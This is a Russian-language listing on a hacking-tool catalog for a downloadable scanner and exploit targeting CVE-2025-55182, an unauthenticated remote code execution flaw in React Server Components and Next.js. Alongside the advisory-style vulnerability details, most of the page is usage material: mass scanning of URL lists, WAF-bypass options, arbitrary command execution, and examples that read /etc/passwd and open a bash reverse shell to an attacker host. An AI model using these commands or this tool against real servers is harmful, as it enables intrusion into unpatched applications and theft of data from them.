Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/l0n3m4n/cve-2025-55182-waf
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubl0n3m4n/cve-2025-55182-waf

CVE-2025-55182-Waf

CVE-2025-55182 – уязвимость удаленного выполнения кода (RCE) в серверах Next.js/React RSC (эксплойт и сканер)

РепозиторийСайт
21149 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер и эксплойт Next.js/React RSC - RCE

Facebook X Medium Buy Me a Coffee ProtonMail


Этот инструмент предназначен для исследователей безопасности и пентестеров, чтобы обнаруживать и эксплуатировать уязвимость CVE-2025-55182 в приложениях Next.js/React RSC. Он предоставляет несколько режимов сканирования, функции эксплуатации и техники обхода WAF.

✨ Возможности

  • 🎯 Несколько режимов сканирования: Выберите между rce, safe и vercel_bypass режимами.
  • 💥 Простая эксплуатация: Выполнение команд или получение обратной оболочки на уязвимых целях.
  • 📂 Пользовательские пейлоады: Предоставление пользовательских пейлоадов в виде строки или из файла.
  • 🛡️ Обход WAF: Техники обхода веб-приложений файрволов.
  • ⚡ Быстрый и конкурентный: Сканирует несколько целей с помощью asyncio.
  • 📝 Подробный вывод: Отшлифованный и детализированный вывод для удобной отладки.
  • 🎨 Цветной вывод: Для лучшей читаемости.
  • 🤖 Автоматическое определение ОС: Автоматически определяет операционную систему цели (Linux/Windows) для более умной эксплуатации, особенно для обратных оболочек.

📈 Детали уязвимости

КатегорияИнформация
Опубликовано2025-12-03
Базовая оценка10.0 (КРИТИЧЕСКИЙ)
ИсследовательLachlan Davidson (https://github.com/lachlan2k)
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ОписаниеКритическая уязвимость удаленного выполнения кода (RCE) в компонентах сервера React. Приложения, использующие серверную среду выполнения React, включая такие фреймворки, как Next.js, затронуты. Проблема вызвана небезопасной десериализацией ненадежных данных протокола "Flight", что позволяет злоумышленнику добиться выполнения кода на сервере без аутентификации. Требуется обновление до исправленных версий React и фреймворков.
Оценка EPSS27.81% (Вероятность эксплуатации)
Каталог CISA KEVВключено: Да, Рынсомвары: Неизвестно
Hacktivity HackerOneРанг: 1, Отчеты: 92
Приоритет исправленияA+

🎯 Затронутые версии

Эта уязвимость затрагивает следующие версии React Server Components:

  • React Server Components: 19.0.0, 19.1.0, 19.1.1, и 19.2.0
  • Next.js версии ≥14.3.0-canary.77, все 15.x, и 16.x
  • фреймворки, использующие RSC: React Router (режим RSC), Waku, Redwood SDK и различные плагины RSC

Следующие пакеты также затронуты:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-webpack

🛠️ Установка```bash

git clone https://github.com/l0n3m4n/CVE-2025-55182.git cd CVE-2025-55182

Create a virtual environment

python3 -m venv venv-55182 source venv-55182/bin/activate

Install dependencies

pip install -r requirements.txt

## использование```bash
❯ python3 CVE-2025-55182.py -h

__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
                         [-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]

Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications

options:
  -h, --help                       show this help message and exit
  -u, --url URL                    Single URL to scan or exploit.
  -f, --file FILE                  File containing a list of URLs to scan/exploit.

Exploitation Options:
  -c, --command COMMAND            Command to execute on the target(s).
  -p, --payloads PAYLOAD           Custom payload to execute on the target(s). Can be a string or a
                                   file path.
  -r, --reverse-shell LHOST:LPORT  Attempt a reverse shell.

Scanning Options:
  -sm, --scan-mode MODE            Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
                                   rce)
  -wb, --waf-bypass                Add junk data to the request to bypass WAFs.
  -wbs, --waf-bypass-size KB       Size of junk data in KB (default: 128).
  -wbu, --waf-bypass-utf16le       Use UTF-16LE encoding to bypass WAFs.

General Options:
  -o, --output FILE                File to save vulnerable URLs from scans.
  -t, --threads NUM                Number of concurrent threads (default: 10).
  -T, --timeout SEC                Request timeout in seconds (default: 10).
  -P, --proxy URL                  Proxy to use (e.g., http://127.0.0.1:8080).
  -H, --header HEADER              Add custom headers (e.g., 'Cookie: session=...').
  -v, --verbose                    Enable verbose output for success/failed/non-vulnerable checks.

🔬 Режимы сканирования

  • rce (по умолчанию): Активный режим сканирования, выполняет echo-команду для подтверждения уязвимости. Это наиболее надежный метод, но он может оставлять логи в целевой системе.
  • safe: Режим сканирования по побочному каналу, не выполняет команды. Проверяет наличие определенного сообщения об ошибке (E{"digest"), чтобы определить, является ли цель уязвимой. Этот режим безопаснее, чем rce, но может быть менее надежным.
  • vercel_bypass: Использует определенный пэйлоад для обхода WAF Vercel и проверяет вывод команды в заголовке X-Action-Redirect.

Техники обхода WAF с разными кодировками

автор @coffinxp7 wafbyass

🚀 Примеры

Сканирование```bash

Scan a single URL with the default rce check

python3 CVE-2025-55182.py -u http://target.com

Scan a list of URLs with the safe mode and 20 threads

python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20

Scan with Vercel WAF bypass mode and save vulnerable URLs to a file

python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt

### Эксплуатация```bash
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"

# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb

# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"
Скачать инструмент